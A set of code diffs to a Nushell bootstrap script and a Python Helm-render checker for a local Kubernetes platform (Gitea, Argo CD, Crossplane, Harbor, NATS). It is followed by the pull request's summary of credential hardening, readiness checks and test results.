@@ -2488,7 +2488,7 @@ def configure_argocd_gitea_access [gitea_pod: string, gitea_token: string] {
     # operator action); user existence and collaborator access above are
     # always re-verified/repaired first, even when the Secret already exists.
     if $secret_exists {
-        print $"(ansi yellow)✓ ArgoCD app-config repository credential already present — preserved (membership re-verified)(ansi reset)"
+        print $"(ansi yellow)✓ ArgoCD app-config repository credential already present — preserved \(membership re-verified\)(ansi reset)"
         return
     }
 
@@ -2508,7 +2508,7 @@ def configure_argocd_gitea_access [gitea_pod: string, gitea_token: string] {
     # hardening) -- must exact-match apps/platform/app-config.yaml's
     # spec.source.repoURL (see the comment there for why).
     persist_argocd_repo_secret "app-config-repo-creds" "https://digiorg.local/gitea/DigiOrg/app-config.git" "argocd-reader" $reader_token
-    print $"(ansi green)✓ ArgoCD app-config repository credential created (read:repository only)(ansi reset)"
+    print $"(ansi green)✓ ArgoCD app-config repository credential created \(read:repository only\)(ansi reset)"
 }
 
 # Create a dedicated, least-privilege Gitea identity for Backstage's own
@@ -2550,7 +2550,7 @@ def configure_backstage_gitea_publisher [gitea_pod: string, gitea_token: string]
     # operator action); user existence and collaborator access above are
     # always re-verified/repaired first, even when the Secret already exists.
     if $secret_exists {
-        print $"(ansi yellow)✓ Backstage app-config publish credential already present — preserved (membership re-verified)(ansi reset)"
+        print $"(ansi yellow)✓ Backstage app-config publish credential already present — preserved \(membership re-verified\)(ansi reset)"
         return
     }
 
@@ -2573,7 +2573,7 @@ def configure_backstage_gitea_publisher [gitea_pod: string, gitea_token: string]
     # three-way apply would otherwise prune backstage-secrets' other keys
     # (POSTGRES_PASSWORD, AUTH_SESSION_SECRET, AUTH_OIDC_CLIENT_SECRET, ...).
     persist_opaque_secret "backstage" "backstage-gitea-credentials" "GITEA_TOKEN" $publisher_token
-    print $"(ansi green)✓ Least-privilege 'backstage-gitea-credentials' created (write:repository only)(ansi reset)"
+    print $"(ansi green)✓ Least-privilege 'backstage-gitea-credentials' created \(write:repository only\)(ansi reset)"
 }
 
 # Generate (once, resume-preserved) and persist the Gitea Actions runner
@@ -3120,13 +3120,13 @@ def check_prerequisites [] {
     # never block `main up`; report it informationally instead.
     let expected_argocd_minor = "3.4"
     if (which argocd | is-empty) {
-        print $"(ansi yellow)  argocd CLI not found (optional) — the stale-status zero-diff fallback will be unavailable(ansi reset)"
+        print $"(ansi yellow)  argocd CLI not found \(optional\) — the stale-status zero-diff fallback will be unavailable(ansi reset)"
     } else {
         let argocd_version = (do { argocd version --client --short } | complete)
         if $argocd_version.exit_code == 0 and (argocd_client_version_compatible $argocd_version.stdout $expected_argocd_minor) {
             print $"(ansi green)✓ argocd CLI \(compatible with v($expected_argocd_minor).x\)(ansi reset)"
         } else {
-            print $"(ansi yellow)  argocd CLI found but not compatible with v($expected_argocd_minor).x (optional) — the stale-status zero-diff fallback will be unavailable(ansi reset)"
+            print $"(ansi yellow)  argocd CLI found but not compatible with v($expected_argocd_minor).x \(optional\) — the stale-status zero-diff fallback will be unavailable(ansi reset)"
         }
     }
 

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -1276,6 +1276,19 @@ def print_sync_diagnostics [state: record] {
     }
 }
 
+def kubectl_result_is_not_found [result: record] {
+    let diagnostic = $"($result.stdout) ($result.stderr)" | str lowercase
+    # kubectl's Kubernetes API NotFound errors include the reason in parentheses.
+    # Do not match generic "not found": credential-helper/config errors use that
+    # wording too and must fail immediately.
+    $diagnostic | str contains "(notfound)"
+}
+
+def kubectl_wait_is_pending [result: record] {
+    let diagnostic = $"($result.stdout) ($result.stderr)" | str lowercase
+    (kubectl_result_is_not_found $result) or ($diagnostic | str contains "timed out waiting")
+}
+
 # crossplane-harbor-bootstrap contains provider-http Request objects. Argo sync
 # waves order Application creation only; they do not prove that package CRDs
 # have been installed. Gate the first Request on the active revision and CRD.
@@ -1285,15 +1298,27 @@ def wait_for_provider_http_ready [] {
         let provider_result = (do {
             kubectl get provider provider-http -o json
         } | complete)
-        if $provider_result.exit_code == 0 {
-            let provider = (try { $provider_result.stdout | from json } catch { {} })
+        if $provider_result.exit_code != 0 {
+            if not (kubectl_result_is_not_found $provider_result) {
+                error make {msg: "Failed to query provider-http while waiting for readiness"}
+            }
+        } else {
+            let provider = (try { $provider_result.stdout | from json } catch {
+                error make {msg: "provider-http returned malformed JSON while waiting for readiness"}
+            })
             let revision = ($provider | get -o status.currentRevision | default "")
             if not ($revision | is-empty) {
                 let revision_result = (do {
                     kubectl get providerrevision $revision -o json
                 } | complete)
-                if $revision_result.exit_code == 0 {
-                    let revision_state = (try { $revision_result.stdout | from json } catch { {} })
+                if $revision_result.exit_code != 0 {
+                    if not (kubectl_result_is_not_found $revision_result) {
+                        error make {msg: "Failed to query the active provider-http revision"}
+                    }
+                } else {
+                    let revision_state = (try { $revision_result.stdout | from json } catch {
+                        error make {msg: "The active provider-http revision returned malformed JSON"}
+                    })
                     let desired = ($revision_state | get -o spec.desiredState | default "Active")
                     let conditions = ($revision_state | get -o status.conditions | default [])
                     let healthy = ($conditions | any {|c| ((($c | get -o type | default "") == "Healthy") and (($c | get -o status | default "") == "True")) })
@@ -1304,6 +1329,9 @@ def wait_for_provider_http_ready [] {
                         if $crd_result.exit_code == 0 {
                             print "  ✓ provider-http is Healthy and requests.http.crossplane.io is Established"
                             return
+                        }
+                        if not (kubectl_wait_is_pending $crd_result) {
+                            error make {msg: "Failed to query the provider-http Request CRD while waiting for readiness"}
                         }
                     }
                 }
@@ -2000,53 +2028,38 @@ def scrub_secret_last_applied_annotation [namespace: string, name: string] {
     }
 }
 
-# Generic single-key opaque Secret writer (Issue #285). Existing Secrets are
-# read in-memory and their complete data map is submitted through server-side
-# apply, so unrelated keys survive the client-side-to-SSA ownership migration.
-# New Secrets start from a one-key manifest. No credential enters argv or disk.
+# Generic single-key opaque Secret writer (Issue #285). Remove client-side
+# apply's annotation before the first SSA write so kubectl cannot migrate and
+# then prune ownership for the whole object. Apply only the target data key with
+# a stable per-key manager; unrelated keys can change concurrently and survive.
+# No credential enters argv, environment variables, logs, or disk.
 def persist_opaque_secret [namespace: string, name: string, key: string, value: string] {
     if ($value | is-empty) {
         error make {msg: $"Refusing to persist an empty value for secret ($namespace)/($name) key ($key)"}
     }
-    let encoded = ($value | encode base64)
-    let current_result = (do {
-        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o json --ignore-not-found
+    let exists_result = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret $name -n $namespace -o name --ignore-not-found
     } | complete)
-    if $current_result.exit_code != 0 {
+    if $exists_result.exit_code != 0 {
         error make {msg: $"Failed to inspect secret ($namespace)/($name) before persisting key ($key)"}
     }
+    if not ($exists_result.stdout | str trim | is-empty) {
+        # This ordering is critical: without it, kubectl's client-side apply
+        # migration can transfer ownership of unrelated fields to this manager.
+        scrub_secret_last_applied_annotation $namespace $name
+    }
 
-    let manifest = if ($current_result.stdout | str trim | is-empty) {
-        {
-            apiVersion: "v1"
-            kind: "Secret"
-            metadata: {name: $name, namespace: $namespace}
-            type: "Opaque"
-            data: {($key): $encoded}
-        }
-    } else {
-        let current = (try { $current_result.stdout | from json } catch {
-            error make {msg: $"Secret ($namespace)/($name) returned invalid JSON"}
-        })
-        mut metadata = {name: $name, namespace: $namespace}
-        let labels = ($current | get -o metadata.labels | default {})
-        if not ($labels | is-empty) { $metadata = ($metadata | insert labels $labels) }
-        let annotations = ($current | get -o metadata.annotations | default {} | reject --optional "kubectl.kubernetes.io/last-applied-configuration")
-        if not ($annotations | is-empty) { $metadata = ($metadata | insert annotations $annotations) }
-        let owners = ($current | get -o metadata.ownerReferences | default [])
-        if not ($owners | is-empty) { $metadata = ($metadata | insert ownerReferences $owners) }
-        let finalizers = ($current | get -o metadata.finalizers | default [])
-        if not ($finalizers | is-empty) { $metadata = ($metadata | insert finalizers $finalizers) }
-        {
-            apiVersion: "v1"
-            kind: "Secret"
-            metadata: $metadata
-            type: ($current | get -o type | default "Opaque")
-            data: ($current | get -o data | default {} | upsert $key $encoded)
-        }
+    let encoded = ($value | encode base64)
+    let field_manager = $"digiorg-bootstrap-secret-($key | str replace --all '.' '-')"
+    let manifest = {
+        apiVersion: "v1"
+        kind: "Secret"
+        metadata: {name: $name, namespace: $namespace}
+        type: "Opaque"
+        data: {($key): $encoded}
     }
     let apply_result = (do {
-        $manifest | to json | kubectl --kubeconfig $KUBECONFIG_PATH apply --server-side --force-conflicts --field-manager digiorg-bootstrap-secret -f -
+        $manifest | to json | kubectl --kubeconfig $KUBECONFIG_PATH apply --server-side --force-conflicts --field-manager $field_manager -f -
     } | complete)
     if $apply_result.exit_code != 0 {
         error make {msg: $"Failed to persist secret ($namespace)/($name)"}

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -1373,13 +1373,20 @@ def wait_for_provider_http_ready [] {
                     })
                     let desired = ($revision_state | get -o spec.desiredState | default "Active")
                     let conditions = ($revision_state | get -o status.conditions | default [])
-                    let healthy = ($conditions | any {|c| ((($c | get -o type | default "") == "Healthy") and (($c | get -o status | default "") == "True")) })
-                    if ($desired == "Active") and $healthy {
+                    # Crossplane v2.3.3's ProviderRevision never carries a bare
+                    # "Healthy" condition -- the revision reconciler only ever
+                    # marks RevisionHealthy/RuntimeHealthy on the revision itself;
+                    # the aggregate "Healthy" condition is written to the parent
+                    # Provider by PackageHealth() (apis/pkg/v1/conditions.go),
+                    # which itself requires both to be True. Mirror that here.
+                    let revision_healthy = ($conditions | any {|c| ((($c | get -o type | default "") == "RevisionHealthy") and (($c | get -o status | default "") == "True")) })
+                    let runtime_healthy = ($conditions | any {|c| ((($c | get -o type | default "") == "RuntimeHealthy") and (($c | get -o status | default "") == "True")) })
+                    if ($desired == "Active") and $revision_healthy and $runtime_healthy {
                         let crd_result = (do {
                             kubectl wait --for=condition=Established crd/requests.http.crossplane.io --timeout=5s
                         } | complete)
                         if $crd_result.exit_code == 0 {
-                            print "  ✓ provider-http is Healthy and requests.http.crossplane.io is Established"
+                            print "  ✓ provider-http revision is RevisionHealthy and RuntimeHealthy, and requests.http.crossplane.io is Established"
                             return
                         }
                         if not (kubectl_wait_is_pending $crd_result) {
@@ -1391,7 +1398,7 @@ def wait_for_provider_http_ready [] {
         }
         sleep 2sec
     }
-    error make {msg: "provider-http did not become Healthy with an Established Request CRD"}
+    error make {msg: "provider-http did not become RevisionHealthy/RuntimeHealthy with an Established Request CRD"}
 }
 
 # Explicitly promote gated major upgrades on the disposable local KinD cluster.

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -1425,6 +1425,18 @@ def sync_gated_apps_for_local_dev [] {
     print $"(ansi cyan_bold)Promoting gated upgrades sequentially on local KinD(ansi reset)"
     for app in $gated_apps {
         if $app == "crossplane-harbor-bootstrap" {
+            # Issue #285 runtime-v10: this Application's Request objects need
+            # crossplane-system/digiorg-local-ca (proven live ReconcileError:
+            # missing crossplane-system/digiorg-local-ca), but Phase 3's CA
+            # copy in `main up` runs AFTER this gated sync loop. Wait only for
+            # cert-manager itself and its Certificate here -- never for the
+            # Harbor Application, which is not yet synced and would deadlock
+            # on Harbor's own PostSync hooks -- then copy the CA before the
+            # existing provider-http gate runs. Idempotent with Phase 3's copy.
+            wait_for_configuration_dependencies "Crossplane Harbor bootstrap TLS" ["cert-manager"] [
+                {namespace: "cert-manager", name: "digiorg-local-ca"}
+            ]
+            copy_digiorg_local_ca_to_namespace "crossplane-system"
             wait_for_provider_http_ready
         }
         mut exists = false

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -1289,18 +1289,67 @@ def kubectl_wait_is_pending [result: record] {
     (kubectl_result_is_not_found $result) or ($diagnostic | str contains "timed out waiting")
 }
 
+# Kubernetes object names are DNS-1123 subdomains. A value that doesn't match
+# cannot be a real resource name the apiserver would have assigned, so treat
+# it as untrusted and refuse to interpolate it into a request path.
+def is_valid_k8s_resource_name [name: string] {
+    if ($name | is-empty) or (($name | str length) > 253) {
+        return false
+    }
+    let labels = ($name | split row ".")
+    $labels | all {|label|
+        let non_empty = not ($label | is-empty)
+        let valid_length = (($label | str length) <= 63)
+        let valid_characters = (($label | parse --regex '^[a-z0-9]([-a-z0-9]*[a-z0-9])?$' | length) == 1)
+        $non_empty and $valid_length and $valid_characters
+    }
+}
+
+def provider_http_failure_summary [result: record] {
+    let diagnostic = $"($result.stdout) ($result.stderr)" | str lowercase
+    if ($diagnostic | str contains "forbidden") {
+        return "Kubernetes API denied the request (Forbidden)"
+    }
+    if ($diagnostic | str contains "unauthorized") or ($diagnostic | str contains "unauthenticated") {
+        return "Kubernetes API rejected authentication"
+    }
+    if ($diagnostic | str contains "credential") or ($diagnostic | str contains "kubeconfig") or ($diagnostic | str contains "current-context") {
+        return "kubectl credential or configuration error"
+    }
+    let transport_markers = [
+        "connection refused", "connection reset", "no route to host",
+        "i/o timeout", "tls handshake timeout", "dial tcp",
+        "context deadline exceeded", "server misbehaving", "no such host",
+        "transport is closing", "error reading from server: eof",
+    ]
+    if ($transport_markers | any {|marker| $diagnostic | str contains $marker }) {
+        return "Kubernetes API transport error"
+    }
+    # kubectl and credential helpers are external processes. Their diagnostics
+    # are untrusted and can echo credentials in arbitrary formats, so never
+    # include raw stdout/stderr in the terminal error.
+    "kubectl request failed (details suppressed)"
+}
+
 # crossplane-harbor-bootstrap contains provider-http Request objects. Argo sync
 # waves order Application creation only; they do not prove that package CRDs
 # have been installed. Gate the first Request on the active revision and CRD.
 def wait_for_provider_http_ready [] {
     print "  Waiting for provider-http ProviderRevision and Request CRD..."
     for attempt in 1..180 {
+        # `kubectl get provider`/`providerrevision` resolves the resource
+        # through discovery/RESTMapper, which can still be stale right after
+        # the package CRDs install -- it then fails with a generic discovery
+        # error (not NotFound) that never recovers on its own. `--raw` hits
+        # the pinned pkg.crossplane.io/v1 path directly (group/version/scope
+        # confirmed against the Crossplane v2.3.3 upstream CRDs), bypassing
+        # discovery entirely.
         let provider_result = (do {
-            kubectl get provider provider-http -o json
+            kubectl get --raw /apis/pkg.crossplane.io/v1/providers/provider-http
         } | complete)
         if $provider_result.exit_code != 0 {
             if not (kubectl_result_is_not_found $provider_result) {
-                error make {msg: "Failed to query provider-http while waiting for readiness"}
+                error make {msg: $"Failed to query provider-http while waiting for readiness: (provider_http_failure_summary $provider_result)"}
             }
         } else {
             let provider = (try { $provider_result.stdout | from json } catch {
@@ -1308,12 +1357,15 @@ def wait_for_provider_http_ready [] {
             })
             let revision = ($provider | get -o status.currentRevision | default "")
             if not ($revision | is-empty) {
+                if not (is_valid_k8s_resource_name $revision) {
+                    error make {msg: "provider-http reported a currentRevision that is not a valid Kubernetes resource name"}
+                }
                 let revision_result = (do {
-                    kubectl get providerrevision $revision -o json
+                    kubectl get --raw $"/apis/pkg.crossplane.io/v1/providerrevisions/($revision)"
                 } | complete)
                 if $revision_result.exit_code != 0 {
                     if not (kubectl_result_is_not_found $revision_result) {
-                        error make {msg: "Failed to query the active provider-http revision"}
+                        error make {msg: $"Failed to query the active provider-http revision: (provider_http_failure_summary $revision_result)"}
                     }
                 } else {
                     let revision_state = (try { $revision_result.stdout | from json } catch {

--- a/scripts/local-setup.nu
+++ b/scripts/local-setup.nu
@@ -92,14 +92,23 @@ def "main up" [] {
     # already-running runner: restart it *before* configure_gitea runs, not
     # after. configure_gitea calls configure_gitea_actions_runner, which
     # unconditionally calls wait_for_gitea_actions_runner_online -- an
-    # already-running runner pod's cached TLS trust does not pick up a
-    # rotated CA without a restart, so polling it for "online" before
-    # restarting deadlocks until the wait's own timeout, even though the
-    # restart later in the run would have fixed it. On a fresh bootstrap the
-    # runner is either not yet scheduled or still waiting on other Phase-3
-    # secrets, so this is a harmless no-op/short wait.
-    if $gitea_ca_changed {
+    # already-running runner pod's cached TLS trust does not pick up a rotated
+    # CA without a restart. On a fresh bootstrap, however, Argo may already have
+    # created the Deployment while it is still waiting for the registration-token
+    # Secret that configure_gitea creates below; waiting for that rollout here
+    # would deadlock. Distinguish an absent Secret from API/RBAC failure and only
+    # restart a previously initialized runner.
+    let runner_token_lookup = (do {
+        kubectl --kubeconfig $KUBECONFIG_PATH get secret gitea-actions-runner-token -n gitea --ignore-not-found -o name
+    } | complete)
+    if $runner_token_lookup.exit_code != 0 {
+        error make {msg: "Failed to determine whether the Gitea Actions runner token exists"}
+    }
+    let runner_token_exists = not ($runner_token_lookup.stdout | str trim | is-empty)
+    if $gitea_ca_changed and $runner_token_exists {
         restart_oidc_deployment_if_present "gitea" "gitea-actions-runner" "120s"
+    } else if $gitea_ca_changed {
+        print $"(ansi yellow)○ gitea/gitea-actions-runner is awaiting first-time registration; it will mount the current CA on first start(ansi reset)"
     }
 
     configure_gitea

--- a/scripts/render_platform_charts.py
+++ b/scripts/render_platform_charts.py
@@ -21,6 +21,50 @@ IMAGE_RE = re.compile(r"^\s*image:\s*[\"']?([^\"'\s]+)", re.MULTILINE)
 FLOATING_RE = re.compile(r"(?i)(?::|^)(latest|main|master|head)$")
 
 
+def nats_env_contract_errors(rendered: str) -> list[str]:
+    stateful_set = next(
+        (
+            document
+            for document in yaml.safe_load_all(rendered)
+            if isinstance(document, dict)
+            and document.get("kind") == "StatefulSet"
+            and document.get("metadata", {}).get("name") == "nats"
+        ),
+        None,
+    )
+    if stateful_set is None:
+        return ["nats: rendered StatefulSet/nats was not found"]
+
+    containers = stateful_set["spec"]["template"]["spec"].get("containers", [])
+    nats = next((container for container in containers if container.get("name") == "nats"), None)
+    if nats is None:
+        return ["nats: rendered StatefulSet/nats has no nats container"]
+
+    expected = {
+        "POD_NAME": {"valueFrom": {"fieldRef": {"fieldPath": "metadata.name"}}},
+        "SERVER_NAME": {"value": "$(POD_NAME)"},
+        "NATS_JSC_NKEY_PUBLIC": {
+            "valueFrom": {
+                "secretKeyRef": {
+                    "name": "nats-jetstream-controller-nkey",
+                    "key": "public.nk",
+                }
+            }
+        },
+    }
+    env = nats.get("env", [])
+    errors: list[str] = []
+    for name, fields in expected.items():
+        matches = [item for item in env if item.get("name") == name]
+        if len(matches) != 1:
+            errors.append(
+                f"nats: rendered nats container must have exactly one {name} env entry"
+            )
+        elif any(matches[0].get(key) != value for key, value in fields.items()):
+            errors.append(f"nats: rendered nats container has an invalid {name} env entry")
+    return errors
+
+
 def sources(app: dict) -> list[dict]:
     spec = app.get("spec", {})
     return spec.get("sources") or ([spec["source"]] if "source" in spec else [])
@@ -59,6 +103,7 @@ def main() -> int:
     rendered = 0
     floating: list[str] = []
     tag_only: set[str] = set()
+    contract_errors: list[str] = []
 
     with tempfile.TemporaryDirectory(prefix="platform-chart-values-") as td:
         tmp = Path(td)
@@ -86,6 +131,8 @@ def main() -> int:
                     return proc.returncode
                 out.write_text(proc.stdout, encoding="utf-8")
                 rendered += 1
+                if name == "nats":
+                    contract_errors.extend(nats_env_contract_errors(proc.stdout))
                 for ref in IMAGE_RE.findall(proc.stdout):
                     # CRD OpenAPI schemas contain `image: description:` prose;
                     # only OCI-like scalar references participate in the policy.
@@ -104,6 +151,11 @@ def main() -> int:
         print("Floating rendered images:", file=sys.stderr)
         for item in floating:
             print(f"  ERROR {item}", file=sys.stderr)
+    if contract_errors:
+        print("Rendered chart contract errors:", file=sys.stderr)
+        for item in contract_errors:
+            print(f"  ERROR {item}", file=sys.stderr)
+    if floating or contract_errors:
         return 1
     print(f"HELM_RENDER_PASS={rendered}; no floating rendered image tags")
     return 0


### PR DESCRIPTION
## Summary
- make AppClaim delivery explicit from Backstage through Gitea and Argo CD
- bootstrap the deterministic Crossplane functions, provider configuration, Harbor robot, NATS controller, and application XRD contract
- add a secure persistent Gitea Actions runner with rootless DinD and stdin-only registration
- inject publishing credentials from Kubernetes Secrets and repair resume/drift cases idempotently
- establish trusted local TLS for Backstage, Argo CD, provider-http, Gitea Actions, Harbor hooks, jobs, and Docker
- enable provider-kubernetes Secret sanitization so Secret data cannot be copied into Object status
- harden Harbor robot reconciliation, permissions, and credential rotation

## Companion PRs
- digiorg/core-portal#9
- digiorg/core-catalog#18

All three PRs are required for the complete Issue #285 delivery path.

## Verification
- 562/562 Core tests
- 103 subtests
- source pin policy and rendered manifest checks
- Nushell validation
- YAML and diff gates
- independent security/runtime review: PASS
- companion Portal: 102/102 tests and independent PASS
- companion Catalog: 202/202 tests and independent PASS

## Deployment validation
A fresh deployment and complete Wizard → Gitea PR → merge → Argo CD → Crossplane → Gitea Actions → Harbor digest → private image pull E2E run will be recorded before final sign-off.

Closes #285
